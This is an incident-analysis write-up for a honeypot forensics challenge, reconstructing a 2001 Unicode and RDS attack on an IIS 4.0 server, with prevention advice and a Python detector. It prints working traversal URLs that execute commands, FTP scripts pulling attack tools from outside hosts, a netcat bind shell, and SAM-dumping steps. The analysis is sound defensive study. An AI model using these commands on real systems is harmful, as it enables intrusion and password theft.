Jon McKnight

[email protected]

 

Scan 14

The Challenge:

On 4 Feb. 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106, otherwise known as lab.wiretrip.net. We have reason to believe that the attacker knew this was a honeypot; however, we decided to release this challenge as it exemplifies the most common of NT attacks found in the wild. Your only source of information is the snort binary log file that captured the entire attack. You can download this in (.gz format, MD5=af1588ce7f7798190694addef3f148f7), or (.zip format, MD5=aca62e19ba49546d2bfd1fa1c71b5751). You will have to extract and analyze the information from this binary log file. Remember, entries will not only be judged on your answers, but on how easy they are to read, and whether you show how you obtained/conducted your analysis.

 

1.Which exploit(s) were used to attack the system?

 

Unicode and RDS: the IIS 4.0 web server folder traversal bug (the %C0%AF "Unicode" exploit) and the MDAC Remote Data Services bug in msadcs.dll (the "RDS" exploit, here RFP's msadc2.pl). Unicode gives command execution as the anonymous web user (IUSR_KENNY on this box); RDS gives it as LocalSystem, because msadcs.dll runs inside inetinfo.exe.

 

2.How were the exploits used to access and control the system?

 

First he verified that the server was vulnerable to Unicode, then to RDS.  He used RDS to write an FTP command script (ftpcom) containing a username, a password and the files he wanted the server to fetch from a remote host (samdump.dll, pdump.exe and nc.exe).  Everything worked except that the password for that FTP server was wrong.  Because RDS returns no command output to the attacker, he could not see the failure and assumed something else was wrong.

He then has the server FTP to his own machine, which works.  Next he created and executed the FTP script via Unicode, and that worked.  He used Unicode to copy cmd.exe into the msadc directory as cmd1.exe, and then used Unicode to bind cmd1.exe to port 6969 with netcat.  I am somewhat puzzled why he did this through Unicode, as netcat then runs only as IUSR_KENNY.  Issuing the netcat command via RDS would have been much quicker and would have given him a LocalSystem shell.

 

3.What was done once access was gained?

 

Johna used RDS to run pdump and redirect its output to a file.  This did not work, however.  At this time Johna also had an IUSR_KENNY-level shell on lab.wiretrip.net via netcat.  He issued a net users command via RDS, redirected the output to a file and then viewed the contents over his Unicode netcat connection.  He then adds a README.NOW.Hax0r file in an effort to alert the admin to patch the server.

 

Next Johna adds the IUSR_KENNY and IWAM_KENNY accounts to the local Administrators group via RDS.  The intent is to give his Unicode netcat shell (which runs as IUSR_KENNY) administrative rights so he can read things like the sam._ file.  One caveat: group membership is fixed in a process's access token at logon, so the nc listener that was already running keeps the token it started with.  Consistent with that, everything in the log that actually needed privilege (the group additions, rdisk, and the type of sam._) went through RDS, which executes inside inetinfo.exe as LocalSystem.

 

He then issues net start to list the running services and tries to add a user called testuser with the password UgotHacked.  That fails, so he falls back on rdisk to refresh the SAM backup (sam._) in the winnt\repair directory.  He tries the command first from the netcat shell, where it does not seem to work, then via RDS; after a few tries the repair files update.  Once sam._ is refreshed he uses type to copy it to C:\har.txt.  He loses his connection and reconnects.  After verifying that the file is there he copies har.txt to wwwroot and fetches har.txt with his web browser.  It is safe to assume that he loads the file into L0phtCrack and starts cracking the Administrator password.

 

Twelve minutes later the jig is up: Johna figures out it is a honeypot.  My guess is that the Administrator's password has been cracked and that gives him his clue.  Add to that clue the fact that one of RFP's boxes is vulnerable to two exploits he has received much press for (writing the msadc2.pl script and researching Unicode).

 

He changes IWAM_KENNY's password to Snake69Snake69.  He deletes har.txt from the wwwroot directory and apparently tells his friends on IRC to check out a box that he has hacked.  This floods the snort log (which it has done) and makes it harder to sift through the data.  I think he has mentioned that it is both Unicode and RDS vulnerable, because a different box connects: a Linux box creates a file called test.txt using RDS.  The contents of the file are "this can't be true".

 

I notice a bunch of different connections looking at the test.txt.  This provides more evidence to the fact that he is communicating with friends over IRC.  The Linux box seems to have told everyone else.

 

Johna creates a new ftpcom file, this time to have lab.wiretrip.net upload whisker.tar.gz to his box.  While whisker was being transferred, another nc listener was started on lab.wiretrip.net through the Unicode hole.  That request carries the same MSIE 5.01/Hotbar User-Agent and the same ASPSESSIONID cookie as Johna's earlier browser requests, so it is most likely Johna restarting his shell, but with other people now aware of the vulnerabilities the log alone cannot prove it.

 

Johna’s last action before the snort log ends is to delete the ftp file that he placed on the server earlier.

 

4.How could this attack have been prevented?

 

Applying the patches for Unicode and RDS, both of which had been available for months before this attack:

 

MS00-057 ("File Permission Canonicalization") for Unicode; MS00-078 ("Web Server Folder Traversal") later confirmed that the MS00-057 patch closes this hole.

http://www.microsoft.com/security/bulletins/MS99-025faq.asp for RDS.  MS99-025 also recommends simply removing the /msadc virtual directory and the RDS DataFactory component if RDS is not needed, which would have removed the LocalSystem command execution altogether.

Beyond patching: the anonymous web account should not be able to write to the web root or the msadc directory, and this server had no business opening outbound FTP connections.  Egress filtering would have stopped both the tool download and the export of the SAM backup.

 

 

5.How much time did you spend on this analysis and writeup?

 

14 hours

 

Bonus Question:

Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?

Yes

At approximately 13:23 GMT Johna issues the following command

 

echo best honeypot i've seen till now :) > rfp.txt

 

It seems he has figured out this was a honeypot.  One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that its owner (RFP) developed.  RFP also researched the Unicode exploit.  I don't think it became apparent to Johna until around the time he issued the honeypot quote.  I say this because he makes some other files like

 

Johna realized this was a honeypot after he had copied the current password file.  It is possible that he cracked the password for the users on lab.wiretrip.net and one of the cracked passwords may have tipped him off.

 


Appendix

 

Notes I made from the Snort log

It looks like they first tried Unicode to view the boot.ini file.  The four variants of the request, fired in quick succession, suggest a script that checks for this vulnerability automatically; there are so many out in the wild that I have no idea which exact script.  Note how the log renders the traversal: %C0%AF is an "overlong" two-byte UTF-8 encoding of '/' (0x2F), which IIS 4 decoded only after its check for ".." had already run.  Where the bytes were sent raw rather than percent-encoded, the dump shows them as À¯ (C0 AF read as Latin-1).

 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..À¯../boot.ini HTTP/1.1

 

It seems the box is vulnerable.  Success at 12:24:18

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:24:18 GMT

Content-Type: text/html

Cache-control: private

Transfer-Encoding: chunked

 

 

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00" 

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos 

 


The next exploit seems to be RFP's RDS exploit (msadc2.pl).  I think the Unicode and RDS exploits are separate scripts and that the intruder has not combined them; I base this on the 1 minute 13 seconds that go by before the intruder attempts RDS.  The GET /msadc/ below comes from a browser (note the MSIE User-Agent) and just checks that the virtual directory exists; the 403 means directory browsing is off, not that msadcs.dll is unreachable.

 

GET /msadc/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword,

application/vnd.ms-powerpoint, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD

HTTP/1.1 403 Access Forbidden

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:25:31 GMT

Connection: close

Content-Type: text/html

Content-Length: 172

 

A professor once told me that written code is like a fingerprint.  Looking at the snort log and then at the code in msadc2.pl, I know the snort log is showing me msadc2.pl being run: the ADCClientVersion header and the !ADM!ROX!YOUR!WORLD! MIME boundary are hard-coded in the script.

 

Snort Log:

 

ADCClientVersion:01.06

Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

 

--!ADM!ROX!YOUR!WORLD!

Content-Type: application/x-varg

Content-Length: 366

 

msadc2.pl snippet:

 

ADCClientVersion:01.06

Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

 

--!ADM!ROX!YOUR!WORLD!

Content-Type: application/x-varg

Content-Length: $reqlen

 

 

First the intruder tests whether the exploit works.  He creates a file called fun containing the word "werd" in the C:\ directory.  (The RDS exploit sends its command as UTF-16LE, so a text dump of the log shows a space after every character; the commands quoted from here on are shown decoded.)

 

cmd /c echo werd >> c:\fun

Date: Sun, 04 Feb 2001 12:26:03 GMT

 

Now the intruder checks whether the file has been created, using the Unicode vulnerability.  Seeing the same four-variant request pattern again verifies that the intruder is using a Unicode script (well, not 100%, but with great certainty).

 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1

 

 

It seems the file is there because "werd" is printed out below.  The RDS command executed, so the server is vulnerable to RDS.

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:26:11 GMT

Content-Type: text/html

Cache-control: private

Transfer-Encoding: chunked

 

werd
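As an added example (my code, not part of the original writeup or of the tools it mentions), the following Python decodes the two request forms seen so far and tags them. It shows why %C0%AF works (a lenient decoder turns the overlong sequence C0 AF into '/', a strict one rejects it), resolves the traversal to find the path actually reached, recovers the RDS command from the log's one-space-per-character rendering, and labels each request. The sample requests are constructed from the strings quoted in this Appendix; the POST request line to /msadc/msadcs.dll (the handler msadc2.pl talks to) is not shown in the log excerpt above and is reconstructed here.

```python
"""Added example (my code, not part of the original writeup or of the tools
it mentions): decode and tag the two request forms seen in this log.
The sample requests are constructed from strings quoted in this Appendix;
the RDS body is the log's rendering (one space after each character), not
the wire bytes."""
from urllib.parse import unquote_to_bytes


def lenient_utf8(raw: bytes) -> str:
    """Decode like a non-validating decoder: accept 'overlong' two-byte forms.
    C0 AF is 110 00000 10 101111, i.e. the 7-bit value 0x2F, a plain '/';
    C1 9C is a backslash the same way.  IIS 4 checked for '..' before this
    decoding happened, which is the whole bug."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")  # anything else: replacement char, move on
            i += 1
    return "".join(out)


def strict_utf8_rejects(raw: bytes) -> bool:
    """A conforming decoder (Python's own) refuses overlong sequences."""
    try:
        raw.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


def canonicalize(url_path: str):
    """Percent-decode, decode leniently, then resolve '..' segments.
    Returns (resolved_path, escaped_root).  The log's raw rendering of the
    bytes ('..À¯..') is handled by encoding the string as Latin-1 first."""
    raw = unquote_to_bytes(url_path.encode("latin-1"))
    text = lenient_utf8(raw).replace("\\", "/")
    stack, escaped = [], False
    for seg in text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True  # walked above the web root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped


def decode_wide(rendered: str) -> str:
    """msadc2.pl sends the command as UTF-16LE; a text dump of the log shows
    each NUL as a space, so the ASCII command sits at the even offsets."""
    return rendered[::2]


def classify(request_line: str, body: str = "") -> dict:
    """Tag one request: traversal, command execution via the traversal, or an
    RDS POST to /msadc/msadcs.dll (the handler msadc2.pl talks to)."""
    method, target = request_line.split()[:2]
    path, _, query = target.partition("?")
    resolved, escaped = canonicalize(path)
    finding = {"path": resolved, "tags": []}
    if escaped:
        finding["tags"].append("unicode-traversal")
        # Key on traversal plus a '/c' query, not on the binary's name:
        # cmd.exe was copied to cmd1.exe precisely to dodge name checks.
        if resolved.lower().endswith(".exe") and query.startswith("/c+"):
            finding["tags"].append("command-execution")
            finding["command"] = unquote_to_bytes(query.replace("+", " ")).decode("latin-1")
    if method == "POST" and resolved.lower() == "/msadc/msadcs.dll":
        finding["tags"].append("rds")
        if body:
            finding["command"] = decode_wide(body)
    return finding


SAMPLE_REQUESTS = [  # constructed from the Appendix; POST line reconstructed
    ("GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1", ""),
    ("GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files"
     "/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1", ""),
    ("POST /msadc/msadcs.dll HTTP/1.1", "c m d   / c   e c h o   w e r d   > >   c : \\ f u n"),
    ("GET /test.txt HTTP/1.0", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    return [classify(line, body) for line, body in requests]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

The detector keys on the resolved path escaping the web root rather than on the name of the executable, because the attacker's copy of cmd.exe as cmd1.exe would slip past a signature that only looks for cmd.exe.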

 


Now the intruder creates a file (called ftpcom) on the server containing the login for an account on a remote FTP server.  Run with ftp -s:ftpcom, the script makes the server log in and download samdump.dll, pdump.exe (pdump.exe requires samdump.dll to run) and nc.exe.

 

cmd /c echo user johna2k > ftpcom

Date: Sun, 04 Feb 2001 12:31:47 GMT

 

cmd /c echo hacker2000 >> ftpcom

Date: Sun, 04 Feb 2001 12:31:54 GMT

 

cmd /c echo get samdump.dll >> ftpcom

Date: Sun, 04 Feb 2001 12:32:01 GMT

 

cmd /c echo get pdump.exe >> ftpcom

Date: Sun, 04 Feb 2001 12:32:08 GMT

 

cmd /c echo get nc.exe >> ftpcom

Date: Sun, 04 Feb 2001 12:32:15 GMT

 

cmd /c echo quit >> ftpcom

Date: Sun, 04 Feb 2001 12:32:22 GMT

 

 

Now the intruder tells the server to FTP to the box that holds the files he needs; in this case that is www.nether.net.

 

cmd /c ftp -s:ftpcom -n www.nether.net

Date: Sun, 04 Feb 2001 12:32:29 GMT

 

Doh!  The login failed (530 Login incorrect), and every RETR that followed was refused.  Because RDS returns no output to the attacker, he cannot see this.

 

220 freenet.nether.net FTP server (SunOS 5.7) ready.

USER johna2k

331 Password required for johna2k.

PASS hacker2000

530 Login incorrect.

PORT 172,16,1,106,12,64

530 Please login with USER and PASS.

RETR samdump.dll

530 Please login with USER and PASS.

RETR pdump.exe

530 Please login with USER and PASS.

RETR nc.exe

530 Please login with USER and PASS.

QUIT

221 Goodbye.

 

 

Not realizing that the FTP failed, the intruder runs pdump and redirects the result into a file called new.pass.

He then builds a second script (ftpcom2) so the server will upload new.pass to www.nether.net.

 

cmd /c pdump.exe >> new.pass

Date: Sun, 04 Feb 2001 12:32:46 GMT

 

cmd /c echo user johna2k > ftpcom2

Date: Sun, 04 Feb 2001 12:32:56 GMT

 

cmd /c echo hacker2000 >> ftpcom2

Date: Sun, 04 Feb 2001 12:33:03 GMT

 

cmd /c put new.pass >> ftpcom2

Date: Sun, 04 Feb 2001 12:33:10 GMT

 

cmd /c echo quit >> ftpcom2

Date: Sun, 04 Feb 2001 12:33:17 GMT

 

cmd /c ftp -s:ftpcom2 -n www.nether.net

Date: Sun, 04 Feb 2001 12:33:24 GMT

 

 

Doh! Doh!  Bad login again, and the intruder still does not know.  Note also the third line of the script above: he typed cmd /c put new.pass >> ftpcom2 without echo, so "put" was run as a command (and failed) and never written to ftpcom2.  Even with a good password nothing would have been uploaded; the session below shows no STOR after the login attempt.

 

220 freenet.nether.net FTP server (SunOS 5.7) ready.

USER johna2k

331 Password required for johna2k.

PASS hacker2000

530 Login incorrect.

QUIT

221 Goodbye.

 

 


Now the intruder has realized that something is wrong and decides to run another test.  The intruder tells the server to ftp to a different ftp server other than www.nether.net.  This time the ftp server is 213.116.251.162, which happens to be the intruder's own server.

 

cmd /c ftp 213.116.251.162

Date: Sun, 04 Feb 2001 12:33:43 GMT

 

The intruder (Johna) connects to his server,

 

--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

 

 


Johna continues to have problems getting his ftp script to work.  At 12:39:58 GMT Johna uses his Unicode script to try and create the ftpcom file.

 

GET

/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1

 

 

Looks like this way works.

 

220--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

USER johna2k

331 User name okay, need password.

PASS haxedj00

230 User logged in, proceed.

PORT 172,16,1,106,12,71

200 PORT Command successful.

RETR nc.exe

150 Opening ASCII mode data connection for nc.exe (59392 bytes).

 

 


He copies cmd.exe to cmd1.exe through Unicode.  This copy must have happened before the 12:39:58 request above, which already invokes cmd1.exe.  Copying cmd.exe under another name is a well-known trick with this bug: the usual reason given is that IIS refuses redirection characters in a request that names cmd.exe, while a copy under another name passes, which is what lets the echo ... >ftpcom redirection above work.

 

/msadc/..À¯../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1

 

 


Now he uses netcat to bind cmd1.exe to port 6969.  Without -L this listener serves a single connection and exits, so it has to be re-launched through Unicode every time he reconnects.

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe

 

Success.  NOTE: this shell runs as IUSR_KENNY, not Administrator.  The prompt is in the msadc directory because that is where cmd1.exe and nc.exe were launched from.

 

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

 

C:\Program Files\Common Files\system\msadc>

 

Now he looks to see if his files are there:

 

02/04/01  06:41a        <DIR>          .

02/04/01  06:41a        <DIR>          ..

09/25/97  07:41a                   596 adcjavas.inc

09/25/97  07:41a                   589 adcvbs.inc

04/30/97  11:00p               208,144 cmd1.exe

02/04/01  06:41a                    98 ftpcom

09/25/97  08:28a               172,816 msadce.dll

09/25/97  08:16a                 5,632 msadcer.dll

09/25/97  08:24a                23,312 msadcf.dll

09/25/97  08:24a                91,408 msadco.dll

09/25/97  08:19a                 5,120 msadcor.dll

09/26/97  08:19a                42,256 msadcs.dll

02/04/01  06:41a                59,392 nc.exe

02/04/01  06:41a                32,768 pdump.exe

10/02/97  07:28a                19,388 readme.txt

02/04/01  06:41a                36,864 samdump.dll

              16 File(s)        698,383 bytes

                          1,690,861,056 bytes free

 

C:\Program Files\Common Files\system\msadc>

 

 

pdump and samdump are there. So is cmd1.exe (which he copied earlier) and ftpcom.

 


Johna is excited, so now he executes pdump via RDS and redirects the output to a file called "yay.txt".

 

cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >>yay.txt

Date: Sun, 04 Feb 2001 12:42:48 GMT

 

He deletes ftpcom and re-runs pdump, this time with a full path for the output file.  The output path was not the problem, though: the unquoted path to pdump.exe contains spaces, so cmd parses C:\Program as the command and nothing runs.  The redirection still creates an empty yay.txt, which is exactly what the C:\ listing below shows (0 bytes).

 

cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt

Date: Sun, 04 Feb 2001 12:43:32 GMT

 

That didn't work so he looks around the c:\ directory of lab.wiretrip.net.

 

 


He issues a net users command via RDS and redirects the output to heh.txt.

 

cmd /c net users >>c:\heh.txt

Date: Sun, 04 Feb 2001 12:48:55 GMT

 

 

Using his Unicode netcat connection he checks to see if the file is there.

 

dir

 

Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\

 

11/26/00  12:34p                     0 AUTOEXEC.BAT

11/26/00  06:57p                   322 boot.ini

12/26/00  07:36p        <DIR>          exploits

02/04/01  06:48a                   263 heh.txt

12/07/00  03:30p        <DIR>          InetPub

12/07/00  03:12p        <DIR>          Multimedia Files

12/26/00  07:10p        <DIR>          New Folder

01/26/01  02:10p            78,643,200 pagefile.sys

12/21/00  08:59p        <DIR>          Program Files

12/21/00  08:59p        <DIR>          TEMP

02/04/01  06:48a        <DIR>          WINNT

12/26/00  07:09p        <DIR>          wiretrip

02/04/01  06:43a                     0 yay.txt

              14 File(s)     78,643,785 bytes

                          1,690,861,056 bytes free

 

Now he issues the type command via his Unicode netcat connection to see the contents of heh.txt

 

 

User accounts for \\

-------------------------------------------------------------------------------

Administrator            Guest                    IUSR_KENNY              

IWAM_KENNY             

 

The command completed with one or more errors.

 

 

 


He is kind enough to leave a file for the admin called README.NOW.Hax0r

 

echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

 


He issues net group and net localgroup commands to obtain information about the groups on lab.wiretrip.net.

 

He tries to add IUSR_KENNY to Domain Admins with net localgroup.  This cannot work: the unquoted group name is parsed as just "Domain", and Domain Admins is a global group, which net localgroup does not manage.

 

cmd /c net localgroup Domain Admins IUSR_KENNY /ADD

Date: Sun, 04 Feb 2001 12:52:58 GMT

 

 

After a couple of unsuccessful tries he adds IUSR_KENNY and IWAM_KENNY to the local Administrators group (not Domain Admins).

 

cmd /c net localgroup administrators IUSR_KENNY /ADD

Date: Sun, 04 Feb 2001 12:55:00 GMT

 

cmd /c net localgroup administrators IWAM_KENNY /ADD

Date: Sun, 04 Feb 2001 12:55:12 GMT

 

 

 

Issuing the 'net localgroup administrators' command he is able to see that that IUSR_KENNY and IWAM_KENNY are now both admins.

 

Alias name     administrators

Comment        Members can fully administer the computer/domain

 

Members

-------------------------------------------------------------------------------

Administrator            Domain Admins            IUSR_KENNY               

IWAM_KENNY              

The command completed successfully.

 


After looking around some more he issues the net start command to see what services are running on the box

 

net start

These Windows NT services are started:

   Alerter

   Computer Browser

   EventLog

   FTP Publishing Service

   IIS Admin Service

   License Logging Service

   Messenger

   MSDTC

   Net Logon

   NT LM Security Support Provider

   Plug and Play

   Protected Storage

   Remote Procedure Call (RPC) Locator

   Remote Procedure Call (RPC) Service

   Server

   Spooler

   TCP/IP NetBIOS Helper

   Workstation

   World Wide Web Publishing Service

 

The command completed successfully.

 

 

 


Now he tries to add a user named testuser with the password UgotHacked.

 

cmd /c net user testuser UgotHacked /ADD

Date: Sun, 04 Feb 2001 12:57:58 GMT

 

Next he tries to add testuser to the local Administrators group.

 

cmd /c net localgroup Administrators testuser /ADD

Date: Sun, 04 Feb 2001 12:58:13 GMT

 

But these commands did not work, and he spends some time trying to find out why before giving up.

 


He turns to rdisk to refresh the winnt\repair directory, which holds a compressed backup of the SAM as sam._.  The switch he wants is /s- (update the repair information, including the SAM, without prompting for a floppy); his first three attempts get the switch wrong.

 

cmd /c rdisk -/s

Date: Sun, 04 Feb 2001 13:05:27 GMT

 

cmd /c rdisk -s

Date: Sun, 04 Feb 2001 13:05:33 GMT

 

cmd /c rdisk

Date: Sun, 04 Feb 2001 13:05:38 GMT

 

Using netcat he checks whether the sam._ file has been updated.  The file's date has not changed, so it has not.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:05a        <DIR>          .

02/04/01  07:05a        <DIR>          ..


10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

11/26/00  06:43p                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

11/26/00  06:43p               124,776 software._

              11 File(s)      1,046,803 bytes

                          1,690,111,488 bytes free

 

 

He reissues the rdisk commands

 

cmd /c rdisk

Date: Sun, 04 Feb 2001 13:06:00 GMT

 

cmd /c rdisk -s/

Date: Sun, 04 Feb 2001 13:06:06 GMT

 

cmd /c rdisk /s-

Date: Sun, 04 Feb 2001 13:06:28 GMT

 

He checks whether this worked.  sam._ has not been updated, but ntuser.da_ and system._ now carry today's date.  At least something is working.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:06a        <DIR>          .

02/04/01  07:06a        <DIR>          ..

10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

02/04/01  07:06a                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

02/04/01  07:05a               177,732 system._

              11 File(s)      3,741,679 bytes

                          1,687,127,552 bytes free

 

 

 

 

Try, try, try again

 

cmd /c rdisk /s-

Date: Sun, 04 Feb 2001 13:06:46 GMT

 

 

Success!  The listing he gets back still shows sam._ at its old date and size (4,593 bytes), but the har.txt he makes from it a minute later is 5,327 bytes, so rdisk did finish rewriting sam._ shortly after this dir.  My guess is that this was the first time rdisk was run on this machine and it took a while to update; one of his earlier /s- commands probably worked, but he wasn't patient.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:06a        <DIR>          .

02/04/01  07:06a        <DIR>          ..

10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

02/04/01  07:06a                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

02/04/01  07:05a               177,732 system._

              11 File(s)      3,741,679 bytes

                          1,686,932,480 bytes free


After he does this he uses type to copy the contents of the sam._ file into a file called har.txt. 

 

cmd /c type c:\winnt\repair\sam._ >>c:\har.txt

Date: Sun, 04 Feb 2001 13:07:32 GMT

 

He verifies the file is there

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\

 

11/26/00  12:34p                     0 AUTOEXEC.BAT

11/26/00  06:57p                   322 boot.ini

11/26/00  12:34p                     0 CONFIG.SYS

12/26/00  07:36p        <DIR>          exploits

02/04/01  07:07a                 5,327 har.txt

12/07/00  03:30p        <DIR>          InetPub

12/07/00  03:12p        <DIR>          Multimedia Files

12/26/00  07:10p        <DIR>          New Folder

01/26/01  02:10p            78,643,200 pagefile.sys

12/21/00  08:59p        <DIR>          Program Files

02/04/01  06:49a                    69 README.NOW.Hax0r

12/21/00  08:59p        <DIR>          TEMP

02/04/01  07:05a        <DIR>          WINNT

12/26/00  07:09p        <DIR>          wiretrip

02/04/01  06:43a                     0 yay.txt

              15 File(s)     78,648,918 bytes

                          1,689,455,616 bytes free

 

 

 

 

 

 

 


He then copied har.txt to wwwroot. 

 

 

C:\InetPub\wwwroot>copy c:\har.txt

        1 file(s) copied.

 

 

 

 

 

Next he views har.txt from his web browser (I assume he copies it to his machine and runs L0phtCrack).

 

 

GET /har.txt HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:11:28 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT

ETag: "5063fd6fab8ec01:b85"

Content-Length: 5327
 

At approximately 13:23 GMT Johna issues the following command, the one discussed under the Bonus Question above:

 

echo best honeypot i've seen till now :) > rfp.txt

 


After looking around for a while, Johna changes IWAM_KENNY's password to Snake69Snake69

 

cmd /c net user IWAM_KENNY Snake69Snake69

Date: Sun, 04 Feb 2001 13:33:07 GMT

 


Someone issues the command

 

echo this can't be true > test.txt

 

Then this person issues the type command to verify the data is in the file.

 

I don't think this is Johna, because this person is running Linux 2.4.1.  I know this is the person who created test.txt because they request it from their web browser immediately afterwards.

 

GET /test.txt HTTP/1.0

If-Modified-Since: Sun, 04 Feb 2001 13:33:15 GMT; length=7

Connection: Keep-Alive

User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.1 i686)

Pragma: no-cache

Host: lab.wiretrip.net

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:34:58 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

Johna's web browser looks like this

 

GET /win2k.gif HTTP/1.1

Accept: */*

Referer: http://lab.wiretrip.net/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

If-Modified-Since: Sat, 16 Dec 2000 00:36:10 GMT

If-None-Match: "0796d2ff866c01:b85"

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB

 

 

 


